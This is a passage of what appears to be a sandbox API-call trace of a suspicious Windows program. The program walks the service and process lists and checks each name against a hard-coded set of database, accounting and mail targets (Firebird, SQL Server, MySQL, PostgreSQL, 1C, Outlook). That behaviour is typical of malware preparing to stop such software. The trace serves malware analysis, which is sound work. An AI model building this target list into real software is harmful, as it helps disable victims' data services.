(lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0040.700] lstrlenW (lpString="Netman") returned 6 [0040.700] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1 [0040.700] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1 [0040.700] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1 [0040.700] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1 [0040.700] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1 [0040.700] lstrlenW (lpString="netprofm") returned 8 [0040.700] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0040.700] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0040.700] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0040.700] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0040.700] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0040.700] lstrlenW (lpString="NlaSvc") returned 6 [0040.700] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0040.700] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0040.700] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0040.700] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0040.700] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0040.700] lstrlenW (lpString="nsi") returned 3 [0040.700] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0040.700] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0040.701] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0040.701] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0040.701] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0040.701] lstrlenW (lpString="PcaSvc") returned 6 [0040.701] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0040.701] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0040.701] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0040.701] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0040.701] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0040.701] lstrlenW (lpString="PlugPlay") returned 8 [0040.701] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0040.701] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0040.701] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0040.701] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0040.701] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0040.701] lstrlenW (lpString="Power") returned 5 [0040.701] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0040.701] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0040.701] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0040.701] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0040.701] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0040.701] lstrlenW (lpString="ProfSvc") returned 7 [0040.701] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0040.701] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0040.701] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0040.701] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0040.701] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0040.701] lstrlenW (lpString="RpcEptMapper") returned 12 [0040.701] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0040.701] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0040.701] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0040.701] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0040.701] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0040.702] lstrlenW (lpString="RpcSs") returned 5 [0040.702] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0040.702] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0040.702] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0040.702] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0040.702] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0040.702] lstrlenW (lpString="SamSs") returned 5 [0040.702] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0040.702] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0040.702] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0040.702] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0040.702] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0040.702] lstrlenW (lpString="Schedule") returned 8 [0040.702] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0040.702] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0040.702] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0040.702] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0040.702] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0040.702] lstrlenW (lpString="SENS") returned 4 [0040.702] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0040.702] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0040.702] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0040.702] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0040.702] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0040.702] lstrlenW (lpString="ShellHWDetection") returned 16 [0040.702] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0040.702] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0040.703] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0040.703] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0040.703] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0040.703] lstrlenW (lpString="Spooler") returned 7 [0040.703] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0040.703] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0040.703] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0040.703] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0040.703] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0040.703] lstrlenW (lpString="swprv") returned 5 [0040.703] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="swprv") returned -1 [0040.703] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="swprv") returned -1 [0040.703] lstrcmpiW (lpString1="sqlwriter", lpString2="swprv") returned -1 [0040.703] lstrcmpiW (lpString1="mssqlserver", lpString2="swprv") returned -1 [0040.703] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="swprv") returned -1 [0040.703] lstrlenW (lpString="SysMain") returned 7 [0040.703] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0040.703] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0040.703] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0040.703] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0040.703] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0040.703] lstrlenW (lpString="Themes") returned 6 [0040.703] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0040.703] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0040.703] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0040.703] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0040.703] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0040.703] lstrlenW (lpString="TrkWks") returned 6 [0040.703] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0040.703] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0040.703] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0040.703] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0040.703] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0040.703] lstrlenW (lpString="UxSms") returned 5 [0040.704] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0040.704] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0040.704] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0040.704] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0040.704] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0040.704] lstrlenW (lpString="VSS") returned 3 [0040.704] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="VSS") returned -1 [0040.704] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="VSS") returned -1 [0040.704] lstrcmpiW (lpString1="sqlwriter", lpString2="VSS") returned -1 [0040.704] lstrcmpiW (lpString1="mssqlserver", lpString2="VSS") returned -1 [0040.704] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="VSS") returned -1 [0040.704] lstrlenW (lpString="WdiServiceHost") returned 14 [0040.704] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1 [0040.704] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1 [0040.704] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1 [0040.704] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1 [0040.704] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1 [0040.704] lstrlenW (lpString="WdiSystemHost") returned 13 [0040.704] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1 [0040.704] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1 [0040.704] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1 [0040.704] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1 [0040.704] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1 [0040.704] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19 [0040.704] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0040.704] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0040.704] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1 [0040.704] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1 [0040.704] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1 [0040.704] lstrlenW (lpString="Winmgmt") returned 7 [0040.704] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1 [0040.704] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1 [0040.704] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1 [0040.704] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1 [0040.705] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1 [0040.705] lstrlenW (lpString="WPDBusEnum") returned 10 [0040.705] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1 [0040.705] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1 [0040.705] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1 [0040.705] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1 [0040.705] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1 [0040.705] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0xba5bf8 | out: hHeap=0xb10000) returned 1 [0040.705] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a0 [0040.708] Process32FirstW (in: hSnapshot=0x1a0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0040.708] Process32NextW (in: hSnapshot=0x1a0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4e, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0040.709] lstrlenW (lpString="System") returned 6 [0040.709] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0040.709] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0040.709] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0040.709] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0040.709] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0040.709] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0040.709] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0040.709] Process32NextW (in: hSnapshot=0x1a0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0040.710] lstrlenW (lpString="smss.exe") returned 8 [0040.710] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0040.710] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0040.710] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0040.710] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0040.710] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0040.710] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0040.710] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0040.710] Process32NextW (in: hSnapshot=0x1a0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0040.711] lstrlenW (lpString="csrss.exe") returned 9 [0040.711] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0040.711] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0040.711] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0040.711] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0040.711] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0040.711] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0040.711] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0040.711] Process32NextW (in: hSnapshot=0x1a0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0040.712] lstrlenW (lpString="wininit.exe") returned 11 [0040.712] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0040.712] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0040.712] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0040.712] Process32NextW (in: hSnapshot=0x1a0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0040.713] lstrlenW (lpString="csrss.exe") returned 9 [0040.713] Process32NextW (in: hSnapshot=0x1a0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0040.714] lstrlenW (lpString="winlogon.exe") returned 12 [0040.714] Process32NextW (in: hSnapshot=0x1a0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0040.714] lstrlenW (lpString="services.exe") returned 12 [0040.714] Process32NextW (in: hSnapshot=0x1a0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0040.715] lstrlenW (lpString="lsass.exe") returned 9 [0040.715] Process32NextW (in: hSnapshot=0x1a0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0040.716] lstrlenW (lpString="lsm.exe") returned 7 [0040.716] Process32NextW (in: hSnapshot=0x1a0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0040.717] lstrlenW (lpString="svchost.exe") returned 11 [0040.717] Process32NextW (in: hSnapshot=0x1a0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0040.717] lstrlenW (lpString="svchost.exe") returned 11 [0040.717] Process32NextW (in: hSnapshot=0x1a0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0040.718] lstrlenW (lpString="svchost.exe") returned 11 [0040.718] Process32NextW (in: hSnapshot=0x1a0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0040.719] lstrlenW (lpString="svchost.exe") returned 11 [0040.719] Process32NextW (in: hSnapshot=0x1a0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x27, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0040.720] lstrlenW (lpString="svchost.exe") returned 11 [0040.720] Process32NextW (in: hSnapshot=0x1a0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0040.721] lstrlenW (lpString="audiodg.exe") returned 11 [0040.721] Process32NextW (in: hSnapshot=0x1a0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0040.721] lstrlenW (lpString="svchost.exe") returned 11 [0040.721] Process32NextW (in: hSnapshot=0x1a0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0040.724] lstrlenW (lpString="svchost.exe") returned 11 [0040.724] Process32NextW (in: hSnapshot=0x1a0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0040.725] lstrlenW (lpString="dwm.exe") returned 7 [0040.725] Process32NextW (in: hSnapshot=0x1a0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0040.726] lstrlenW (lpString="explorer.exe") returned 12 [0040.726] Process32NextW (in: hSnapshot=0x1a0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0040.727] lstrlenW (lpString="spoolsv.exe") returned 11 [0040.727] Process32NextW (in: hSnapshot=0x1a0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0040.727] lstrlenW (lpString="taskhost.exe") returned 12 [0040.727] Process32NextW (in: hSnapshot=0x1a0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0040.728] lstrlenW (lpString="svchost.exe") returned 11 [0040.728] Process32NextW (in: hSnapshot=0x1a0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0040.729] lstrlenW (lpString="taskeng.exe") returned 11 [0040.729] Process32NextW (in: hSnapshot=0x1a0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0040.729] lstrlenW (lpString="taskhost.exe") returned 12 [0040.730] Process32NextW (in: hSnapshot=0x1a0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x588, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ingredients posters keywords.exe")) returned 1 [0040.730] lstrlenW (lpString="ingredients posters keywords.exe") returned 32 [0040.730] Process32NextW (in: hSnapshot=0x1a0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="moderate-instruments-repairs.exe")) returned 1 [0040.731] lstrlenW (lpString="moderate-instruments-repairs.exe") returned 32 [0040.731] Process32NextW (in: hSnapshot=0x1a0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sa_shape.exe")) returned 1 [0040.732] lstrlenW (lpString="sa_shape.exe") returned 12 [0040.732] Process32NextW (in: hSnapshot=0x1a0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x788, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="confidence.exe")) returned 1 [0040.733] lstrlenW (lpString="confidence.exe") returned 14 [0040.733] Process32NextW (in: hSnapshot=0x1a0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="jaguar_assist_dictionaries.exe")) returned 1 [0040.733] lstrlenW (lpString="jaguar_assist_dictionaries.exe") returned 30 [0040.733] Process32NextW (in: hSnapshot=0x1a0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="blue.exe")) returned 1 [0040.734] lstrlenW (lpString="blue.exe") returned 8 [0040.734] Process32NextW (in: hSnapshot=0x1a0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="newly debut.exe")) returned 1 [0040.735] lstrlenW (lpString="newly debut.exe") returned 15 [0040.735] Process32NextW (in: hSnapshot=0x1a0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="symbols_garage_parents.exe")) returned 1 [0040.736] lstrlenW (lpString="symbols_garage_parents.exe") returned 26 